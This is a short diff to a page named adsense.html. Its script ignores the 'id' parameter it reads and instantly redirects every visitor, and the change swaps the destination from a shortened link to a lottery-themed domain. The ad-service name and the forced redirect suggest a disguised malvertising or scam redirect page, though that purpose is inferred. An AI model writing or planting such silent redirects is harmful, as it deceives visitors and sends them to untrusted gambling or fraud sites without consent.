--- a/adsense.html
+++ b/adsense.html
@@ -8,7 +8,7 @@
 <script>
     const urlParams = new URLSearchParams(window.location.search);
     const customId = urlParams.get('id');
-    const newUrl = `https://tinyurl.com/yosintvxyz `;
+    const newUrl = ` https://lotto7.getemoji.online/ `;
     window.location.replace(newUrl);
 </script>
 </body>
